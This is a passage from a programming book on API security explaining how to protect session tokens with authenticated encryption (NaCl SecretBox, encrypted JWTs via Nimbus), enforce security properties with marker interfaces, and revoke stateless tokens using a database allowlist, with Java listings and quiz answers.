raphers have developed several dedicated authenticated encryption modes, such as
Galois/Counter Mode (GCM) for AES. JOSE supports both GCM and EtM encryption
modes, which you’ll examine in section 6.3.3, but we’ll begin by looking at a simpler
alternative.
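As a sketch, if you had built the EncryptedTokenStore on an unauthenticated cipher such as AES in CTR mode (which the version in listing 6.5 is not), the secure Encrypt-then-MAC composition would wrap the encryption inside the HMAC:

// Encrypt-then-MAC: encrypt the token first, then compute the HMAC tag
// over the resulting ciphertext. The EncryptedTokenStore here is a
// hypothetical CTR-based store, not the authenticated one in listing 6.5.
TokenStore store =
        new HmacTokenStore(                       // MAC applied last
                new EncryptedTokenStore(
                        new JsonTokenStore(), encryptionKey),
                macKey);

Because the tag covers the ciphertext, the recipient verifies it before attempting any decryption.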
6.3.2 Authenticated encryption with NaCl
Because cryptography is complex with many subtle details to get right, a recent trend
has been for cryptography libraries to provide higher-level APIs that hide many of
these details from developers. The most well-known of these is the Networking and
Cryptography Library (NaCl; https://nacl.cr.yp.to) designed by Daniel Bernstein. NaCl
(pronounced “salt,” as in sodium chloride) provides high-level operations for authen-
ticated encryption, digital signatures, and other cryptographic primitives but hides
many of the details of the algorithms being used. Using a high-level library designed
by experts such as NaCl is the safest option when implementing cryptographic protec-
tions for your APIs and can be significantly easier to use securely than alternatives.
TIP
Other cryptographic libraries designed to be hard to misuse include
Google’s Tink (https://github.com/google/tink) and Themis from Cossack
Labs (https://github.com/cossacklabs/themis). The Sodium library (https://
libsodium.org) is a widely used clone of NaCl in C that provides many additional
extensions and a simplified API with bindings for Java and other languages.
In this section, you’ll use a pure Java implementation of NaCl called Salty Coffee
(https://github.com/NeilMadden/salty-coffee), which provides a very simple and
Java-friendly API with acceptable performance.2 To add the library to the Natter API
project, open the pom.xml file in the root folder of the Natter API project and add
the following lines to the dependencies section:
<dependency>
<groupId>software.pando.crypto</groupId>
<artifactId>salty-coffee</artifactId>
<version>1.0.2</version>
</dependency>
Listing 6.5 shows an EncryptedTokenStore implemented using the Salty Coffee library’s
SecretBox class, which provides authenticated encryption. Like the HmacTokenStore,
you can delegate creating the token to another store, allowing this to be wrapped
around the JsonTokenStore or another format. Encryption is then performed with
the SecretBox.encrypt() method. This method returns a SecretBox object, which
has methods for getting the encrypted ciphertext and the authentication tag. The
toString() method encodes these components into a URL-safe string that you can use
directly as the token ID. To decrypt the token, you can use the SecretBox.from-
String() method to recover the SecretBox from the encoded string, and then use the
decryptToString() method to decrypt it and get back the original token ID. Navigate
to the src/main/java/com/manning/apisecurityinaction/token folder again and cre-
ate a new file named EncryptedTokenStore.java with the contents of listing 6.5.
2 I wrote Salty Coffee, reusing cryptographic code from Google's Tink library, to provide a simple pure Java
solution. Bindings to libsodium are generally faster if you can use a native library.
Listing 6.5  An EncryptedTokenStore

package com.manning.apisecurityinaction.token;

import java.security.Key;
import java.util.Optional;

import software.pando.crypto.nacl.SecretBox;
import spark.Request;

public class EncryptedTokenStore implements TokenStore {
    private final TokenStore delegate;
    private final Key encryptionKey;

    public EncryptedTokenStore(TokenStore delegate, Key encryptionKey) {
        this.delegate = delegate;
        this.encryptionKey = encryptionKey;
    }

    @Override
    public String create(Request request, Token token) {
        // Call the delegate TokenStore to generate the token ID, then
        // use the SecretBox.encrypt() method to encrypt it.
        var tokenId = delegate.create(request, token);
        return SecretBox.encrypt(encryptionKey, tokenId).toString();
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        // Decode and decrypt the box and then use the original token ID.
        var box = SecretBox.fromString(tokenId);
        var originalTokenId = box.decryptToString(encryptionKey);
        return delegate.read(request, originalTokenId);
    }

    @Override
    public void revoke(Request request, String tokenId) {
        var box = SecretBox.fromString(tokenId);
        var originalTokenId = box.decryptToString(encryptionKey);
        delegate.revoke(request, originalTokenId);
    }
}
As you can see, the EncryptedTokenStore using SecretBox is very short because the
library takes care of almost all details for you. To use the new store, you’ll need to gen-
erate a new key to use for encryption rather than reusing the existing HMAC key.
PRINCIPLE
A cryptographic key should only be used for a single purpose. Use
separate keys for different functionality or algorithms.
Because Java’s keytool command doesn’t support generating keys for the encryption
algorithm that SecretBox uses, you can instead generate a standard AES key and then
convert it as the two key formats are identical. SecretBox only supports 256-bit keys,
so run the following command in the root folder of the Natter API project to add a
new AES key to the existing keystore:
keytool -genseckey -keyalg AES -keysize 256 \
-alias aes-key -keystore keystore.p12 -storepass changeit
You can then load the new key in the Main class just as you did for the HMAC key in
chapter 5. Open Main.java in your editor and locate the lines that load the HMAC key
from the keystore and add a new line to load the AES key:
var macKey = keyStore.getKey("hmac-key", keyPassword);  // The existing HMAC key
var encKey = keyStore.getKey("aes-key", keyPassword);   // The new AES key
You can convert the key into the correct format with the SecretBox.key() method,
passing in the raw key bytes, which you can get by calling encKey.getEncoded(). Open
the Main.java file again and update the code that constructs the TokenController to
convert the key and use it to create an EncryptedTokenStore, wrapping a JsonToken-
Store, instead of the previous JWT-based implementation:
var naclKey = SecretBox.key(encKey.getEncoded());  // Convert the key to the correct format.
var tokenStore = new EncryptedTokenStore(          // Construct the EncryptedTokenStore
    new JsonTokenStore(), naclKey);                // wrapping a JsonTokenStore.
var tokenController = new TokenController(tokenStore);
You can now restart the API and log in again to get a new encrypted token.
6.3.3 Encrypted JWTs
NaCl’s SecretBox is hard to beat for simplicity and security, but there is no standard
for how encrypted tokens are formatted into strings and different libraries may use
different formats or leave this up to the application. This is not a problem when
tokens are only consumed by the same API that generated them but can become an
issue if tokens are shared between many APIs, developed by separate teams in differ-
ent programming languages. A standard format such as JOSE becomes more compel-
ling in these cases. JOSE supports several authenticated encryption algorithms in the
JSON Web Encryption (JWE) standard.
An encrypted JWT using the JWE Compact Serialization looks superficially like the
HMAC JWTs from section 6.2, but there are more components reflecting the more
complex structure of an encrypted token, shown in figure 6.5. The five components of
a JWE are:
1. The JWE header, which is very like the JWS header, but with two additional fields: enc, which specifies the encryption algorithm, and zip, which specifies an optional compression algorithm to be applied before encryption.
2. An optional encrypted key. This is used in some of the more complex encryption algorithms. It is empty for the direct symmetric encryption algorithm that is covered in this chapter.
3. The initialization vector or nonce used when encrypting the payload. Depending on the encryption method being used, this will be either a 12- or 16-byte random binary value that has been Base64url-encoded.
4. The encrypted ciphertext.
5. The MAC authentication tag.
DEFINITION
An initialization vector (IV) or nonce (number-used-once) is a
unique value that is provided to the cipher to ensure that ciphertext is always
different even if the same message is encrypted more than once. The IV
should be generated using a java.security.SecureRandom or other cryp-
tographically-secure pseudorandom number generator (CSPRNG).3 An IV
doesn’t need to be kept secret.
JWE divides specification of the encryption algorithm into two parts:

- The enc header describes the authenticated encryption algorithm used to encrypt the payload of the JWE.
- The alg header describes how the sender and recipient agree on the key used to encrypt the content.

There are a wide variety of key management algorithms for JWE, but for this chapter you will stick to direct encryption with a secret key. For direct encryption, the algorithm header is set to dir (direct). There are currently two available families of encryption methods in JOSE, both of which provide authenticated encryption:

- A128GCM, A192GCM, and A256GCM use AES in Galois/Counter Mode (GCM).
- A128CBC-HS256, A192CBC-HS384, and A256CBC-HS512 use AES in Cipher Block Chaining (CBC) mode together with HMAC in an EtM configuration as described in section 6.3.1.
3 A nonce only needs to be unique and could be a simple counter. However, synchronizing a counter across
many servers is difficult and error-prone so it’s best to always use a random value.
Figure 6.5  A JWE in Compact Serialization consists of 5 components: a header, an encrypted key (blank in this case), an initialization vector or nonce, the encrypted ciphertext, and then the authentication tag. Each component is URL-safe Base64-encoded. Values have been truncated for display.
DEFINITION
All the encryption algorithms allow the JWE header and IV to be
included in the authentication tag without being encrypted. These are known
as authenticated encryption with associated data (AEAD) algorithms.
GCM was designed for use in protocols like TLS where a unique session key is negoti-
ated for each session and a simple counter can be used for the nonce. If you reuse a
nonce with GCM then almost all security is lost: an attacker can recover the MAC key
and use it to forge tokens, which is catastrophic for authentication tokens. For this
reason, I prefer to use CBC with HMAC for directly encrypted JWTs, but for other
JWE algorithms GCM is an excellent choice and very fast.
CBC requires the input to be padded to a multiple of the AES block size (16 bytes),
and this historically has led to a devastating vulnerability known as a padding oracle
attack, which allows an attacker to recover the full plaintext just by observing the dif-
ferent error messages when an API tries to decrypt a token they have tampered with.
The use of HMAC in JOSE prevents this kind of tampering and largely eliminates the
possibility of padding oracle attacks, and the padding has some security benefits.
WARNING
You should avoid revealing the reason why decryption failed to the
callers of your API to prevent oracle attacks like the CBC padding oracle attack.
What key size should you use?

AES allows keys to be in one of three different sizes: 128-bit, 192-bit, or 256-bit. In principle, correctly guessing a 128-bit key is well beyond the capability of even an attacker with enormous amounts of computing power. Trying every possible value of a key is known as a brute-force attack and should be impossible for a key of that size. There are three exceptions in which that assumption might prove to be wrong:

- A weakness in the encryption algorithm might be discovered that reduces the amount of effort required to crack the key. Increasing the size of the key provides a security margin against such a possibility.
- New types of computers might be developed that can perform brute-force searches much quicker than existing computers. This is believed to be true of quantum computers, but it's not known whether it will ever be possible to build a large enough quantum computer for this to be a real threat. Doubling the size of the key protects against known quantum attacks for symmetric algorithms like AES.
- Theoretically, if each user has their own encryption key and you have millions of users, it may be possible to attack every key simultaneously for less effort than you would expect from naively trying to break them one at a time. This is known as a batch attack and is described further in https://blog.cr.yp.to/20151120-batchattacks.html.

At the time of writing, none of these attacks are practical for AES, and for short-lived authentication tokens the risk is significantly less, so 128-bit keys are perfectly safe. On the other hand, modern CPUs have special instructions for AES encryption, so there's very little extra cost for 256-bit keys if you want to eliminate any doubt.
Remember that the JWE CBC with HMAC methods take a key that is twice the size as normal. For example, the A128CBC-HS256 method requires a 256-bit key, but this is really two 128-bit keys joined together rather than a true 256-bit key.
6.3.4 Using a JWT library
Due to the relative complexity of producing and consuming encrypted JWTs compared to HMAC, you'll continue using the Nimbus JWT library in this section. Encrypting a JWT with Nimbus requires a few steps, as shown in listing 6.6:

- First you build a JWT claims set using the convenient JWTClaimsSet.Builder class.
- You can then create a JWEHeader object to specify the algorithm and encryption method.
- Finally, you encrypt the JWT using a DirectEncrypter object initialized with the AES key.

The serialize() method on the EncryptedJWT object will then return the JWE Compact Serialization. Navigate to src/main/java/com/manning/apisecurityinaction/token and create a new file named EncryptedJwtTokenStore.java. Type in the contents of listing 6.6 to create the new token store and save the file. As for the JsonTokenStore, leave the revoke method blank for now. You'll fix that in section 6.6.
Listing 6.6  The EncryptedJwtTokenStore

package com.manning.apisecurityinaction.token;

import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.*;
import com.nimbusds.jwt.*;
import spark.Request;

import javax.crypto.SecretKey;
import java.text.ParseException;
import java.util.*;

public class EncryptedJwtTokenStore implements TokenStore {
    private final SecretKey encKey;

    public EncryptedJwtTokenStore(SecretKey encKey) {
        this.encKey = encKey;
    }

    @Override
    public String create(Request request, Token token) {
        // Build the JWT claims set.
        var claimsBuilder = new JWTClaimsSet.Builder()
                .subject(token.username)
                .audience("https://localhost:4567")
                .expirationTime(Date.from(token.expiry));
        token.attributes.forEach(claimsBuilder::claim);

        // Create the JWE header and assemble the header and claims.
        var header = new JWEHeader(JWEAlgorithm.DIR,
                EncryptionMethod.A128CBC_HS256);
        var jwt = new EncryptedJWT(header, claimsBuilder.build());

        try {
            // Encrypt the JWT using the AES key in direct encryption mode.
            var encrypter = new DirectEncrypter(encKey);
            jwt.encrypt(encrypter);
        } catch (JOSEException e) {
            throw new RuntimeException(e);
        }

        // Return the Compact Serialization of the encrypted JWT.
        return jwt.serialize();
    }

    @Override
    public void revoke(Request request, String tokenId) {
    }
}
Processing an encrypted JWT using the library is just as simple as creating one. First,
you parse the encrypted JWT and then decrypt it using a DirectDecrypter initialized
with the AES key, as shown in listing 6.7. If the authentication tag validation fails
during decryption, then the library will throw an exception. To further reduce the
possibility of padding oracle attacks in CBC mode, you should never return any details
about why decryption failed to the user, so just return an empty Optional here as if no
token had been supplied. You can log the exception details to a debug log that is only
accessible to system administrators if you wish. Once the JWT has been decrypted, you
can extract and validate the claims from the JWT. Open EncryptedJwtTokenStore.java
in your editor again and implement the read method as in listing 6.7.
Listing 6.7  The JWT read method

@Override
public Optional<Token> read(Request request, String tokenId) {
    try {
        // Parse the encrypted JWT.
        var jwt = EncryptedJWT.parse(tokenId);

        // Decrypt and authenticate the JWT using the DirectDecrypter.
        var decryptor = new DirectDecrypter(encKey);
        jwt.decrypt(decryptor);

        // Extract any claims from the JWT.
        var claims = jwt.getJWTClaimsSet();
        if (!claims.getAudience().contains("https://localhost:4567")) {
            return Optional.empty();
        }
        var expiry = claims.getExpirationTime().toInstant();
        var subject = claims.getSubject();
        var token = new Token(expiry, subject);
        var ignore = Set.of("exp", "sub", "aud");
        for (var attr : claims.getClaims().keySet()) {
            if (ignore.contains(attr)) continue;
            token.attributes.put(attr, claims.getStringClaim(attr));
        }

        return Optional.of(token);
    } catch (ParseException | JOSEException e) {
        // Never reveal the cause of a decryption failure to the user.
        return Optional.empty();
    }
}
You can now update the main method to switch to using the EncryptedJwtToken-
Store, replacing the previous EncryptedTokenStore. You can reuse the AES key that
you generated in section 6.3.2, but you’ll need to cast it to the more specific
javax.crypto.SecretKey class that the Nimbus library expects. Open Main.java and
update the code to create the token controller again:
TokenStore tokenStore = new EncryptedJwtTokenStore(
    (SecretKey) encKey);  // Cast the key to the more specific SecretKey class.
var tokenController = new TokenController(tokenStore);
Restart the API and try it out:
$ curl -H 'Content-Type: application/json' \
-u test:password -X POST https://localhost:4567/sessions
{"token":"eyJlbmMiOiJBMjU2R0NNIiwiYWxnIjoiZGlyIn0..hAOoOsgfGb8yuhJD
➥ .kzhuXMMGunteKXz12aBSnqVfqtlnvvzqInLqp83zBwUW_rqWoQp5wM_q2D7vQxpK
➥ TaQR4Nuc-D3cPcYt7MXAJQ.ZigZZclJPDNMlP5GM1oXwQ"}
Compressed tokens

The encrypted JWT is a bit larger than either a simple HMAC token or the NaCl tokens from section 6.3.2. JWE supports optional compression of the JWT Claims Set before encryption, which can significantly reduce the size for complex tokens. But combining encryption and compression can lead to security weaknesses. Most encryption algorithms do not hide the length of the plaintext message that was encrypted, and compression reduces the size of a message based on its content. For example, if two parts of a message are identical, then it may combine them to remove the duplication. If an attacker can influence part of a message, they may be able to guess the rest of the contents by seeing how much it compresses. The CRIME and BREACH attacks (http://breachattack.com) against TLS were able to exploit this leak of information from compression to steal session cookies from compressed HTTP pages. These kinds of attacks are not always a risk, but you should carefully consider the possibility before enabling compression. Unless you really need to save space, you should leave compression disabled.
Pop quiz

4. Which STRIDE threats does authenticated encryption protect against? (There are multiple correct answers.)
   a) Spoofing
   b) Tampering
   c) Repudiation
   d) Information disclosure
   e) Denial of service
   f) Elevation of privilege

5. What is the purpose of the initialization vector (IV) in an encryption algorithm?
   a) It's a place to add your name to messages.
   b) It slows down decryption to prevent brute force attacks.
   c) It increases the size of the message to ensure compatibility with different algorithms.
   d) It ensures that the ciphertext is always different even if a duplicate message is encrypted.

6. True or False: An IV should always be generated using a secure random number generator.

The answers are at the end of the chapter.
6.4 Using types for secure API design
Imagine that you have implemented token storage using the kit of parts that you developed in this chapter, creating a JsonTokenStore and wrapping it in an EncryptedTokenStore to add authenticated encryption, providing both confidentiality and authenticity of tokens. But it would be easy for somebody to accidentally remove the encryption if they simply commented out the EncryptedTokenStore wrapper in the main method, losing both security properties. If you'd developed the EncryptedTokenStore using an unauthenticated encryption scheme such as CTR mode and then manually combined it with the HmacTokenStore, the risk would be even greater because not every way of combining those two stores is secure, as you learned in section 6.3.1.

The kit-of-parts approach to software design is often appealing to software engineers, because it results in a neat design with proper separation of concerns and maximum reusability. This was useful when you could reuse the HmacTokenStore, originally designed to protect database-backed tokens, to also protect JSON tokens stored on the client. But a kit-of-parts design is opposed to security if there are many insecure ways to combine the parts and only a few that are secure.

PRINCIPLE  Secure API design should make it very hard to write insecure code. It is not enough to merely make it possible to write secure code, because developers will make mistakes.

You can make a kit-of-parts design harder to misuse by using types to enforce the security properties you need, as shown in figure 6.6. Rather than all the individual token
stores implementing a generic TokenStore interface, you can define marker interfaces that describe the security properties of the implementation. A ConfidentialTokenStore ensures that token state is kept secret, while an AuthenticatedTokenStore ensures that the token cannot be tampered with or faked. We can then define a SecureTokenStore that is a sub-type of each of the security properties that we want to enforce. In this case, you want the token controller to use a token store that is both confidential and authenticated. You can then update the TokenController to require a SecureTokenStore, enforcing that an insecure implementation is not used by mistake.

DEFINITION  A marker interface is an interface that defines no new methods. It is used purely to indicate that the implementation has certain desirable properties.

Navigate to src/main/java/com/manning/apisecurityinaction/token and add the three new marker interfaces, as shown in listing 6.8. Create three separate files, ConfidentialTokenStore.java, AuthenticatedTokenStore.java, and SecureTokenStore.java to hold the three new interfaces.
Figure 6.6 You can use marker interfaces to indicate the security properties of your individual token stores. The TokenStore interface provides the basic operations. If a store provides only confidentiality, it should implement the ConfidentialTokenStore interface. You can then define a SecureTokenStore by subtyping the desired combination of security properties. In this case, it ensures both confidentiality and authentication.
Listing 6.8 The secure marker interfaces

// In ConfidentialTokenStore.java:
package com.manning.apisecurityinaction.token;

public interface ConfidentialTokenStore extends TokenStore {
}

// In AuthenticatedTokenStore.java:
package com.manning.apisecurityinaction.token;

public interface AuthenticatedTokenStore extends TokenStore {
}

// In SecureTokenStore.java:
package com.manning.apisecurityinaction.token;

public interface SecureTokenStore extends ConfidentialTokenStore,
        AuthenticatedTokenStore {
}
You can now change each of the token stores to implement an appropriate interface:

- If you assume that the backend cookie storage is secure against injection and other attacks, then the CookieTokenStore can be updated to implement the SecureTokenStore interface.
- If you've followed the hardening advice from chapter 5, the DatabaseTokenStore can also be marked as a SecureTokenStore. If you want to ensure that it is always used with HMAC for extra protection against tampering, then mark it as only confidential.
- The JsonTokenStore is completely insecure on its own, so leave it implementing the base TokenStore interface.
- The SignedJwtTokenStore provides no confidentiality for claims in the JWT, so it should only implement the AuthenticatedTokenStore interface.
- The HmacTokenStore turns any TokenStore into an AuthenticatedTokenStore. But if the underlying store is already confidential, then the result is a SecureTokenStore. You can reflect this difference in code by making the HmacTokenStore constructor private and providing two static factory methods instead, as shown in listing 6.9. If the underlying store is confidential, then the first method will return a SecureTokenStore. For anything else, the second method will be called and return only an AuthenticatedTokenStore.
- The EncryptedTokenStore and EncryptedJwtTokenStore can both be changed to implement SecureTokenStore because they both provide authenticated encryption that achieves the combined security goals no matter what underlying store is passed in.
Listing 6.9 Updating the HmacTokenStore

// Mark the HmacTokenStore as secure.
public class HmacTokenStore implements SecureTokenStore {

    private final TokenStore delegate;
    private final Key macKey;

    // Make the constructor private.
    private HmacTokenStore(TokenStore delegate, Key macKey) {
        this.delegate = delegate;
        this.macKey = macKey;
    }

    // When passed a ConfidentialTokenStore, returns a SecureTokenStore.
    public static SecureTokenStore wrap(ConfidentialTokenStore store,
            Key macKey) {
        return new HmacTokenStore(store, macKey);
    }

    // When passed any other TokenStore, returns only an AuthenticatedTokenStore.
    public static AuthenticatedTokenStore wrap(TokenStore store,
            Key macKey) {
        return new HmacTokenStore(store, macKey);
    }
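The effect of the two factory methods is easiest to see at a call site, because the compiler picks the overload based on the static type of the first argument. A brief sketch, assuming the store constructors from earlier chapters and a macKey in scope:

TokenStore json = new JsonTokenStore();
var authenticated = HmacTokenStore.wrap(json, macKey);
// Static type AuthenticatedTokenStore: json is only known to be a TokenStore.

ConfidentialTokenStore db = new DatabaseTokenStore(database);
var secure = HmacTokenStore.wrap(db, macKey);
// Static type SecureTokenStore: the more specific overload applies.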
You can now update the TokenController class to require a SecureTokenStore to be passed to it. Open TokenController.java in your editor and update the constructor to take a SecureTokenStore:

public TokenController(SecureTokenStore tokenStore) {
    this.tokenStore = tokenStore;
}

This change makes it much harder for a developer to accidentally pass in an implementation that doesn't meet your security goals, because the code will fail to type-check. For example, if you try to pass in a plain JsonTokenStore, then the code will fail to compile with a type error. These marker interfaces also provide valuable documentation of the expected security properties of each implementation, and a guide for code reviewers and security audits to check that they achieve them.
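For example, with the stores built in this chapter (a sketch; encKey and macKey as created earlier):

// Fails to compile: JsonTokenStore is only a TokenStore.
// new TokenController(new JsonTokenStore());

// Still fails: HMAC adds authentication but not confidentiality.
// new TokenController(HmacTokenStore.wrap(new JsonTokenStore(), macKey));

// Compiles: authenticated encryption provides both security properties.
new TokenController(new EncryptedJwtTokenStore(encKey));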
6.5 Handling token revocation
Stateless self-contained tokens such as JWTs are great for moving state out of the database. On the face of it, this increases the ability to scale up the API without needing additional database hardware or more complex deployment topologies. It's also much easier to set up a new API with just an encryption key rather than needing to deploy a new database or adding a dependency on an existing one. After all, a shared token database is a single point of failure. But the Achilles' heel of stateless tokens is how to handle token revocation. If all the state is on the client, it becomes much harder to invalidate that state to revoke a token. There is no database to delete the token from.

There are a few ways to handle this. First, you could just ignore the problem and not allow tokens to be revoked. If your tokens are short-lived and your API does not handle sensitive data or perform privileged operations, then you might be comfortable
with the risk of not letting users explicitly log out. But few APIs fit this description; almost all data is sensitive to somebody. This leaves several options, almost all of which involve storing some state on the server after all:

- You can add some minimal state to the database that lists a unique ID associated with the token. To revoke a JWT, you delete the corresponding record from the database. To validate the JWT, you must now perform a database lookup to check if the unique ID is still in the database. If it is not, then the token has been revoked. This is known as an allowlist.[4]
- A twist on the above scheme is to only store the unique ID in the database when the token is revoked, creating a blocklist of revoked tokens. To validate, make sure that there isn't a matching record in the database. The unique ID only needs to be blocked until the token expires, at which point it will be invalid anyway. Using short expiry times helps keep the blocklist small. (A minimal sketch of this approach follows the list.)
- Rather than blocking individual tokens, you can block certain attributes of a set of tokens. For example, it is a common security practice to invalidate all of a user's existing sessions when they change their password. Users often change their password when they believe somebody else may have accessed their account, so invalidating any existing sessions will kick the attacker out. Because there is no record of the existing sessions on the server, you could instead record an entry in the database saying that all tokens issued to user Mary before lunchtime on Friday should be considered invalid. This saves space in the database at the cost of increased query complexity.
- Finally, you can issue short-lived tokens and force the user to reauthenticate regularly. This limits the damage that can be done with a compromised token without needing any additional state on the server but provides a poor user experience. In chapter 7, you'll use OAuth2 refresh tokens to provide a more transparent version of this pattern.

[4] The terms allowlist and blocklist are now preferred over the older terms whitelist and blacklist due to negative connotations associated with the old terms.
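Here is the blocklist idea from the second option as a minimal sketch. It is not part of the book's Natter code: the class is illustrative, and it keeps the blocklist in memory for brevity, so it only works for a single API server.

package com.manning.apisecurityinaction.token;

import java.util.Optional;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

import spark.Request;

public class BlocklistingTokenStore implements SecureTokenStore {

    private final SecureTokenStore delegate;
    // A real deployment would use a shared database table and expire
    // entries once the underlying token would have expired anyway.
    private final Set<String> blocklist = ConcurrentHashMap.newKeySet();

    public BlocklistingTokenStore(SecureTokenStore delegate) {
        this.delegate = delegate;
    }

    @Override
    public String create(Request request, Token token) {
        return delegate.create(request, token);
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        // A blocklisted token has been revoked, so treat it as invalid.
        if (blocklist.contains(tokenId)) {
            return Optional.empty();
        }
        return delegate.read(request, tokenId);
    }

    @Override
    public void revoke(Request request, String tokenId) {
        blocklist.add(tokenId);
    }
}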
6.5.1 Implementing hybrid tokens
The existing DatabaseTokenStore can be used to implement a list of valid JWTs, and this is the simplest and most secure default for most APIs. While this involves giving up on the pure stateless nature of a JWT architecture, and may initially appear to offer the worst of both worlds (reliance on a centralized database along with the risky nature of client-side state), in fact it offers many advantages over each storage strategy on its own:

- Database tokens can be easily and immediately revoked. In September 2018, Facebook was hit by an attack that exploited a vulnerability in some token-handling code to quickly gain access to the accounts of many users (https://newsroom.fb.com/news/2018/09/security-update/). In the wake of the attack, Facebook
revoked 90 million tokens, forcing those users to reauthenticate. In a disaster situation, you don't want to be waiting hours for tokens to expire or suddenly finding scalability issues with your blocklist when you add 90 million new entries.
- On the other hand, plain database tokens may be vulnerable to token theft and forgery if the database is compromised, as described in section 5.3 of chapter 5. In that chapter, you hardened database tokens by using the HmacTokenStore to prevent forgeries. Wrapping database tokens in a JWT or other authenticated token format achieves the same protections.
- Less security-critical operations can be performed based on data in the JWT alone, avoiding a database lookup. For example, you might decide to let a user see which Natter social spaces they are a member of and how many unread messages they have in each of them without checking the revocation status of the token, but require a database check when they actually try to read one of those or post a new message.
- Token attributes can be moved between the JWT and the database depending on how sensitive they are or how likely they are to change. You might want to store some basic information about the user in the JWT but store a last activity time for implementing idle timeouts in the database because it will change frequently.
DEFINITION  An idle timeout (or inactivity logout) automatically revokes an authentication token if it hasn't been used for a certain amount of time. This can be used to automatically log out a user if they have stopped using your API but have forgotten to log out manually.
Listing 6.10 shows the EncryptedJwtTokenStore updated to list valid tokens in the database. It does this by taking an instance of the DatabaseTokenStore as a constructor argument and uses that to create a dummy token with no attributes. If you wanted to move attributes from the JWT to the database, you can do that here by populating the attributes in the database token and removing them from the JWT token. The token ID returned from the database is then stored inside the JWT as the standard JWT ID (jti) claim. Open EncryptedJwtTokenStore.java in your editor and update it to allowlist tokens in the database as in the listing.
Listing 6.10 Allowlisting JWTs in the database

public class EncryptedJwtTokenStore implements SecureTokenStore {

    private final SecretKey encKey;
    // Inject a DatabaseTokenStore into the EncryptedJwtTokenStore
    // to use for the allowlist.
    private final DatabaseTokenStore tokenAllowlist;

    public EncryptedJwtTokenStore(SecretKey encKey,
            DatabaseTokenStore tokenAllowlist) {
        this.encKey = encKey;
        this.tokenAllowlist = tokenAllowlist;
    }
    @Override
    public String create(Request request, Token token) {
        // Save a copy of the token in the database but remove
        // all the attributes to save space.
        var allowlistToken = new Token(token.expiry, token.username);
        var jwtId = tokenAllowlist.create(request, allowlistToken);

        var claimsBuilder = new JWTClaimsSet.Builder()
                .jwtID(jwtId)   // Save the database token ID in the JWT as the JWT ID claim.
                .subject(token.username)
                .audience("https://localhost:4567")
                .expirationTime(Date.from(token.expiry));
        token.attributes.forEach(claimsBuilder::claim);

        var header = new JWEHeader(JWEAlgorithm.DIR,
                EncryptionMethod.A128CBC_HS256);
        var jwt = new EncryptedJWT(header, claimsBuilder.build());
        try {
            var encryptor = new DirectEncrypter(encKey);
            jwt.encrypt(encryptor);
        } catch (JOSEException e) {
            throw new RuntimeException(e);
        }
        return jwt.serialize();
    }
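To use the new store, the main method needs the database token store as well. A sketch of the wiring, assuming the Database object and the AES encKey from earlier sections are in scope and that DatabaseTokenStore's constructor takes the Database as in chapter 5:

var databaseTokenStore = new DatabaseTokenStore(database);
var tokenStore = new EncryptedJwtTokenStore(
        (SecretKey) encKey, databaseTokenStore);
var tokenController = new TokenController(tokenStore);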
To revoke a JWT, you then simply delete it from the database token store, as shown in listing 6.11. Parse and decrypt the JWT as before, which will validate the authentication tag, and then extract the JWT ID and revoke it from the database. This will remove the corresponding record from the database. While you still have EncryptedJwtTokenStore.java open in your editor, add the implementation of the revoke method from the listing.
Listing 6.11 Revoking a JWT in the database allowlist

    @Override
    public void revoke(Request request, String tokenId) {
        try {
            // Parse, decrypt, and validate the JWT using the decryption key.
            var jwt = EncryptedJWT.parse(tokenId);
            var decryptor = new DirectDecrypter(encKey);
            jwt.decrypt(decryptor);

            // Extract the JWT ID and revoke it from the
            // DatabaseTokenStore allowlist.
            var claims = jwt.getJWTClaimsSet();
            tokenAllowlist.revoke(request, claims.getJWTID());
        } catch (ParseException | JOSEException e) {
            throw new IllegalArgumentException("invalid token", e);
        }
    }
The final part of the solution is to check that the allowlist token hasn’t been revoked
when reading a JWT token. As before, parse and decrypt the JWT using the decryption
key. Then extract the JWT ID and perform a lookup in the DatabaseTokenStore. If the entry exists in the database, then the token is still valid, and you can continue validating the other JWT claims as before. But if the database returns an empty result, then the token has been revoked and so it is invalid. Update the read() method in EncryptedJwtTokenStore.java to implement this additional check, as shown in listing 6.12. If you moved some attributes into the database, then you could also copy them to the token result in this case.
Listing 6.12 Checking if a JWT has been revoked

    var jwt = EncryptedJWT.parse(tokenId);        // Parse and decrypt the JWT.
    var decryptor = new DirectDecrypter(encKey);
    jwt.decrypt(decryptor);
    var claims = jwt.getJWTClaimsSet();

    // Check if the JWT ID still exists in the database allowlist. If not,
    // then the token is invalid; otherwise, proceed with validating the
    // other JWT claims.
    var jwtId = claims.getJWTID();
    if (tokenAllowlist.read(request, jwtId).isEmpty()) {
        return Optional.empty();
    }
    // Validate other JWT claims
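Putting the pieces together, the whole read method now looks something like the following sketch. It combines listing 6.7 with the new allowlist check; the only other change I've made is adding jti to the set of claims skipped when copying attributes, since it is handled separately:

@Override
public Optional<Token> read(Request request, String tokenId) {
    try {
        var jwt = EncryptedJWT.parse(tokenId);
        var decryptor = new DirectDecrypter(encKey);
        jwt.decrypt(decryptor);
        var claims = jwt.getJWTClaimsSet();

        // Reject the token if it is no longer on the allowlist.
        var jwtId = claims.getJWTID();
        if (tokenAllowlist.read(request, jwtId).isEmpty()) {
            return Optional.empty();
        }

        if (!claims.getAudience().contains("https://localhost:4567")) {
            return Optional.empty();
        }
        var expiry = claims.getExpirationTime().toInstant();
        var token = new Token(expiry, claims.getSubject());
        var ignore = Set.of("exp", "sub", "aud", "jti");
        for (var attr : claims.getClaims().keySet()) {
            if (ignore.contains(attr)) continue;
            token.attributes.put(attr, claims.getStringClaim(attr));
        }
        return Optional.of(token);
    } catch (ParseException | JOSEException e) {
        return Optional.empty();
    }
}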
Answers to pop quiz questions

1. a and b. HMAC prevents an attacker from creating bogus authentication tokens (spoofing) or tampering with existing ones.
2. e. The aud (audience) claim lists the servers that a JWT is intended to be used by. It is crucial that your API rejects any JWT that isn't intended for that service.
3. False. The algorithm header can't be trusted and should be ignored. You should associate the algorithm with each key instead.
4. a, b, and d. Authenticated encryption includes a MAC so protects against spoofing and tampering threats just like HMAC. In addition, these algorithms protect confidential data from information disclosure threats.
5. d. The IV (or nonce) ensures that every ciphertext is different.
6. True. IVs should be randomly generated. Although some algorithms allow a simple counter, these are very hard to synchronize between API servers and reuse can be catastrophic to security.
Summary

